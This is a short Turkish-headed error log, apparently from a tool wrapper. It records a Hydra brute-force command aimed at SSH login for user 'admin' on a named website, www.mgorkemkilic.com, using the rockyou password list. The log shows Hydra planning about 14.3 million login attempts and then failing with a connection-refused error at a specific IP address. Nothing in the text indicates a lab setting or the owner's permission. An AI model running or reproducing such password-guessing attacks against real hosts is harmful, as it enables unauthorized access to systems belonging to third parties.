--- HATA OLUŞTU ---
Komut: hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://www.mgorkemkilic.com -t 4 -I -f
Hata Kodu: 255
Çıktı:
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-11 11:52:33
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://www.mgorkemkilic.com:22/

Hata Çıktısı:
[ERROR] could not connect to ssh://34.120.137.41:22 - Connection refused
